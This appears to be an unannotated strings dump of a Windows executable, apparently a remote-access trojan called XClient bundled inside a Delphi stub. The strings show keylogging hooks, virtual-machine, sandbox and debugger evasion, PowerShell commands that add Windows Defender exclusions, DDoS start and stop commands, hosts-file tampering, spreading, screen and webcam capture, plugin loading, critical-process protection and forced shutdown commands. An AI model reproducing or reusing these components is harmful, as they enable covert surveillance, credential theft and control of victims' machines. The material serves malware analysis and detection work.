This program must be run under Win32
.idata
.rdata
P.reloc
P.rsrc
YZ]_^[
YZ]_^[
_^[YY]
YZ]_^[
~KxI[)
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
_^[YY]
HBITMAP
YXZQRPR
R;P P|
IVXLCDMT
_^[YY]
_^[YY]
XH;XH~
9PD}-RP
PH9PL~
KH+KLQ
;CHRQ~
RP;P ~
t SPRQj
_^[YY]
QQQQQS
\PROGRA~1\
QQQQQQSVW
_^[YY]
QQQQQQS3
QQQQQQ
QQQQQQSV
Runtime error at 00000000
0123456789ABCDEF
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetVersion
GetCurrentThreadId
GetThreadLocale
GetStartupInfoA
GetLocaleInfoA
GetCommandLineA
FreeLibrary
ExitProcess
WriteFile
UnhandledExceptionFilter
RtlUnwind
RaiseException
GetStdHandle
user32.dll
GetKeyboardType
MessageBoxA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
SysReAllocStringLen
kernel32.dll
TlsSetValue
TlsGetValue
LocalAlloc
GetModuleHandleA
advapi32.dll
RegSetValueExA
RegOpenKeyExA
RegCloseKey
kernel32.dll
WriteFile
WinExec
SetFilePointer
SetFileAttributesA
SetEndOfFile
SetCurrentDirectoryA
ReleaseMutex
ReadFile
GetWindowsDirectoryA
GetTempPathA
GetShortPathNameA
GetModuleFileNameA
GetLogicalDriveStringsA
GetLocalTime
GetLastError
GetFileSize
GetFileAttributesA
GetDriveTypeA
GetCommandLineA
FreeLibrary
FindNextFileA
FindFirstFileA
FindClose
DeleteFileA
CreateMutexA
CreateFileA
CreateDirectoryA
CloseHandle
gdi32.dll
StretchDIBits
SetDIBits
SelectObject
GetObjectA
GetDIBits
DeleteObject
DeleteDC
CreateSolidBrush
CreateDIBSection
CreateCompatibleDC
CreateCompatibleBitmap
BitBlt
user32.dll
ReleaseDC
GetSysColor
GetIconInfo
FillRect
DestroyIcon
CopyImage
CharLowerBuffA
shell32.dll
ShellExecuteA
ExtractIconA
0"0*020:0B0J0R0Z0b0j0r0z0
4-595T5
8&8,848F8R8a8m8u8
9/9:9[9s9
<'<0<;<D<K<Z<a<
?2?\?e?u?}?
0(0@0L0T0k0z0
0,1P1n1~1
2$2u2|2
4#4+4O4o4
8A8Q8g8
9*929H9`9n9
9+:X:a:
< =T=\=g=
>N>R>X>\>a>h>n>v>
?%?/?7?=?K?f?{?
N0W0}0
466?6:7C7
<)<2<><E<
=/=;=B=L=V=m=~=
>/>@>J>R>Z>b>j>
?&?+?0?7?>?H?_?k?x?
0:0B0J0R0Z0b0j0r0z0
1"1*121:1B1J1R1Z1b1j1r1z1
2#202B2J2R2_2k2x2
3 323?3K3X3j3w3
4$4(4,484<4@4L4P4T4`4d4h4t4x4|4
9,;:;A;H;c;o;
:(;=;c;
=*=:=c=9>n>
1&151R1i1
:":U:t:
:2;H;b;
;Y<j<,=
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1l1t1
004080
1 1$1(1
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADD
3b %(1
v4.0.30319
#Strings
<Module>
mscorlib
Microsoft.VisualBasic
MyApplication
MyComputer
MyProject
MyWebServices
ThreadSafeObjectProvider`1
Settings
ClientSocket
Messages
Uninstaller
XLogger
ProcessCritical
AlgorithmAES
Helper
LowLevelKeyboardProc
LASTINPUTINFO
EXECUTION_STATE
Microsoft.VisualBasic.ApplicationServices
ApplicationBase
Microsoft.VisualBasic.Devices
Computer
System
Object
.cctor
get_Computer
m_ComputerObjectProvider
get_Application
m_AppObjectProvider
get_User
m_UserObjectProvider
get_WebServices
m_MyWebServicesObjectProvider
Application
WebServices
Equals
GetHashCode
GetType
ToString
Create__Instance__
instance
Dispose__Instance__
get_GetInstance
m_ThreadStaticValue
GetInstance
InstallDir
InstallStr
LoggerPath
Exclusion
RunAntiAnalysis
anyrun
DetectManufacturer
DetectDebugger
DetectSandboxie
GetModuleHandle
lpModuleName
CheckRemoteDebuggerPresent
hProcess
isDebuggerPresent
isConnected
System.Net.Sockets
Socket
BufferLength
Buffer
System.IO
MemoryStream
System.Threading
ManualResetEvent
allDone
SendSync
Interval
ActivatePong
BeginConnect
ConnectServer
INDATE
Spread
Antivirus
IAsyncResult
BeginReceive
BeginRead
EndSend
isDisconnected
Plugin
SendMSG
SendError
Thread
ReportWindow
Monitoring
OpenUrl
Hidden
capCreateCaptureWindowA
lpszWindowName
dwStyle
nWidth
nHeight
hwndParent
Handle
capGetDriverDescriptionA
wDriver
lpszName
cbName
lpszVer
RunDisk
Extension
Memory
buffer
IsUpdate
CurrentActiveWindowTitle
SetHook
HookCallback
wParam
lParam
KeyboardLayout
vkCode
GetActiveWindowTitle
WM_KEYDOWN
_hookID
SetWindowsHookEx
idHook
dwThreadId
UnhookWindowsHookEx
CallNextHookEx
WHKEYBOARDLL
GetForegroundWindow
GetWindowThreadProcessId
lpdwProcessId
GetKeyState
keyCode
GetKeyboardState
lpKeyState
GetKeyboardLayout
idThread
System.Text
StringBuilder
ToUnicodeEx
wVirtKey
wScanCode
pwszBuff
cchBuff
wFlags
MapVirtualKey
uMapType
SetCurrentProcessIsCritical
isCritical
refWasCritical
needSystemCriticalBreaks
Microsoft.Win32
SessionEndingEventArgs
SystemEvents_SessionEnding
sender
CriticalProcess_Enable
CriticalProcesses_Disable
Decrypt
ProcessDpi
SetProcessDpiAwareness
awareness
IsValidDomainName
FileStream
fileStream
Alphabet
Random
current
GetRandomString
length
GetLastInputInfo
idletime
lastInputInf
GetLastInputTime
TimeSpan
sumofidletime
LastLastIdletime
LastAct
userAgents
GetWindowText
SetThreadExecutionState
esFlags
PreventSleep
GetHashT
strToHash
SetValue
GetValue
Decompress
Compress
AES_Encryptor
AES_Decryptor
_appMutex
CreateMutex
CloseMutex
MulticastDelegate
TargetObject
TargetMethod
AsyncCallback
BeginInvoke
DelegateCallback
DelegateAsyncState
EndInvoke
DelegateAsyncResult
Invoke
ValueType
cbSize
dwTime
value__
ES_CONTINUOUS
ES_DISPLAY_REQUIRED
ES_SYSTEM_REQUIRED
System.ComponentModel
EditorBrowsableAttribute
EditorBrowsableState
System.CodeDom.Compiler
GeneratedCodeAttribute
System.Diagnostics
DebuggerHiddenAttribute
Microsoft.VisualBasic.CompilerServices
StandardModuleAttribute
HideModuleNameAttribute
System.ComponentModel.Design
HelpKeywordAttribute
System.Runtime.CompilerServices
RuntimeHelpers
GetObjectValue
RuntimeTypeHandle
GetTypeFromHandle
Activator
CreateInstance
MyGroupCollectionAttribute
System.Runtime.InteropServices
ComVisibleAttribute
ThreadStaticAttribute
CompilerGeneratedAttribute
Interaction
Environ
String
Concat
VB$AnonymousDelegate_0
_Lambda$__1
_Lambda$__2
_Lambda$__3
DebuggerDisplayAttribute
DebuggerStepThroughAttribute
Exception
FileInfo
Conversions
Environment
ExpandEnvironmentVariables
ProjectData
SetProjectError
ClearProjectError
DirectoryInfo
get_Directory
get_FullName
Directory
Exists
CreateDirectory
Delete
ReadAllBytes
WriteAllBytes
SpecialFolder
GetFolderPath
GetFileNameWithoutExtension
CreateObject
Boolean
NewLateBinding
LateGet
ChangeType
LateSetComplex
LateCall
FileMode
ThreadStart
ToBoolean
ProcessStartInfo
set_FileName
ProcessWindowStyle
set_WindowStyle
set_Arguments
Process
WaitForExit
GetCurrentProcess
ProcessModule
get_MainModule
get_ModuleName
GetFileName
FailFast
System.Net
WebClient
DownloadString
Contains
ComputerInfo
get_OSFullName
ToLower
System.Collections
IEnumerator
System.Management
ManagementObjectSearcher
IEnumerable
GetEnumerator
get_Current
LateIndexGet
Operators
CompareString
ToUpperInvariant
MoveNext
IDisposable
Dispose
get_Handle
IntPtr
ToInt32
WaitHandle
WaitOne
STAThreadAttribute
DllImportAttribute
kernel32.dll
_Lambda$__4
_Lambda$__5
IPAddress
GetHostAddresses
TimerCallback
AddressFamily
SocketType
ProtocolType
set_ReceiveBufferSize
set_SendBufferSize
ToInteger
Connect
SocketFlags
EventWaitHandle
get_UserName
Replace
OperatingSystem
get_OSVersion
get_ServicePack
get_Is64BitOperatingSystem
DateTime
FileSystemInfo
get_LastWriteTime
System.Security.Principal
WindowsIdentity
GetCurrent
WindowsPrincipal
WindowsBuiltInRole
IsInRole
ManagementBaseObject
ManagementObjectCollection
ManagementObjectEnumerator
get_MachineName
get_Item
Append
get_Length
Substring
ObjectQuery
ManagementObject
ConcatenateObject
ServerComputer
get_Info
get_TotalPhysicalMemory
UInt64
Conversion
Double
Remove
EndReceive
ToArray
ToLong
Stream
WriteByte
ParameterizedThreadStart
ObjectFlowControl
CheckForSyncLockOnValueType
Monitor
SelectMode
BeginSend
Collect
_Closure$__1
$VB$Local_Host
$VB$Local_Port
_Lambda$__8
_Lambda$__6
_Lambda$__7
System.Drawing
Graphics
Rectangle
Bitmap
Strings
CompareMethod
System.Windows.Forms
Restart
SocketShutdown
Shutdown
Convert
FromBase64String
ServicePointManager
set_Expect100Continue
SecurityProtocolType
set_SecurityProtocol
set_DefaultConnectionLimit
GetTempPath
Combine
DownloadFile
AppWinStyle
AddObject
ReadAllText
WriteAllText
get_Message
Microsoft.VisualBasic.MyServices
RegistryProxy
get_Registry
RegistryKey
get_CurrentUser
DeleteSubKey
Screen
get_PrimaryScreen
get_Bounds
get_Width
get_Height
System.Drawing.Imaging
PixelFormat
FromImage
CopyPixelOperation
CopyFromScreen
GraphicsUnit
DrawImage
ImageFormat
get_Jpeg
ToBase64String
System.Reflection
MethodInfo
AppDomain
get_CurrentDomain
Assembly
GetTypes
MemberInfo
get_Name
GetMethods
ConditionalCompareObjectEqual
StartsWith
Stopwatch
FromSeconds
get_Elapsed
op_GreaterThan
System.Collections.Generic
List`1
GetProcesses
get_MainWindowTitle
IsNullOrEmpty
Func`2
System.Core
System.Linq
Enumerable
IEnumerable`1
HttpWebRequest
HttpWebResponse
WebRequest
Create
set_UserAgent
set_AllowAutoRedirect
set_Timeout
set_Method
WebResponse
GetResponse
EndsWith
get_EntryPoint
MethodBase
ParameterInfo
GetParameters
Encoding
get_UTF8
GetBytes
avicap32.dll
MarshalAsAttribute
UnmanagedType
StreamWriter
GetTempFileName
TextWriter
WriteLine
get_StartupPath
get_ExecutablePath
set_CreateNoWindow
set_ErrorDialog
set_UseShellExecute
get_ProcessName
op_Explicit
op_Equality
Marshal
ReadInt32
ToUInteger
get_NewLine
UInt32
GetProcessById
IsNullOrWhiteSpace
user32.dll
OutAttribute
SessionEndingEventHandler
SystemEvents
add_SessionEnding
EnterDebugMode
NTdll.dll
RtlSetProcessIsCritical
System.Security.Cryptography
RijndaelManaged
ICryptoTransform
MD5CryptoServiceProvider
HashAlgorithm
ComputeHash
SymmetricAlgorithm
set_Key
CipherMode
set_Mode
CreateDecryptor
TransformFinalBlock
get_FileName
UriHostNameType
CheckHostName
get_Chars
SizeOf
get_TickCount
GetString
get_ProcessorCount
get_SystemDirectory
GetPathRoot
DriveInfo
get_TotalSize
get_ASCII
ToUpper
Registry
CurrentUser
RegistryKeyPermissionCheck
CreateSubKey
RegistryValueKind
BitConverter
System.IO.Compression
GZipStream
CompressionMode
SubtractObject
CreateEncryptor
SHCore.dll
StructLayoutAttribute
LayoutKind
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
GuidAttribute
AssemblyFileVersionAttribute
AssemblyTrademarkAttribute
AssemblyCopyrightAttribute
AssemblyProductAttribute
AssemblyCompanyAttribute
AssemblyDescriptionAttribute
AssemblyTitleAttribute
XClient
XClient.exe
MyTemplate
14.0.0.0
My.Computer
My.WebServices
My.Application
My.User
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
<generated method>
<generated method>
WrapNonExceptionThrows
$1338dc4a-b438-42bd-9915-ac2cf810895e
1.0.0.0
_CorExeMain
mscoree.dll
DVCLAL
PACKAGEINFO
MAINICON(
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
1.0.0.0
InternalName
XClient.exe
LegalCopyright
OriginalFilename
XClient.exe
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
3+2WURJWxxMQ45ImsGY/iw==
HB1C11RV1pMSIUwRLTgPhw==
wcqXRaQu/zQxXbh9xB2SmQ==
0bcR+0waqpw2CIvTbc41dg==
NH3xg45YEuSeLIr3dRBXrg==
raJ2kbVLkyIkk1VCxL29dA==
T6Ei0kEVxSBe42B4ue1W+Q==
2InBNC5s2vtNLCJX1Ord0pbSh2ZrElSQwuKKfot7smJqJyWSm48zd02MN/2ECp8S
2IFtGtBpRNgvGbsg
\Log.tmp
WScript.Shell
CreateShortcut
TargetPath
WorkingDirectory
powershell.exe
-ExecutionPolicy Bypass Add-MpPreference -ExclusionPath '
-ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '
http://ip-api.com/line/?fields=hosting
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Microsoft
Service Pack
dd/MM/yyy
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
SELECT * FROM Win32_VideoController
Win32_Processor.deviceid="CPU0"
Core(TM)
uninstall
update
Urlopen
Urlhide
PCShutdown
shutdown.exe /f /s /t 0
PCRestart
shutdown.exe /f /r /t 0
PCLogoff
shutdown.exe -L
RunShell
StartDDos
StopDDos
StartReport
StopReport
\drivers\etc\hosts
Shosts
HostsMSG
Modified successfully!
HostsErr
plugin
sendPlugin
savePlugin
RemovePlugins
Plugins Removed!
OfflineGet
Plugin
Invoke
RunRecovery
Recovery
RunOptions
injRun
UACFunc
ngrok+
Plugin Error!
ToLower
Open [
-ExecutionPolicy Bypass -File "
POST / HTTP/1.1
Host:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
User-Agent:
Content-length: 5235
@echo off
timeout 3 > NUL
" /f /q
ToUpper
[SPACE]
Return
[ENTER]
Escape
LControlKey
[CTRL]
RControlKey
RShiftKey
[Shift]
LShiftKey
[Back]
Capital
[CAPSLOCK: OFF]
[CAPSLOCK: ON]
MainWindowTitle
ProcessName
Software\
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
abcdefghijklmnopqrstuvwxyz
Err HWID
ToArray
abcdefghijklmnopqrstuvwxyz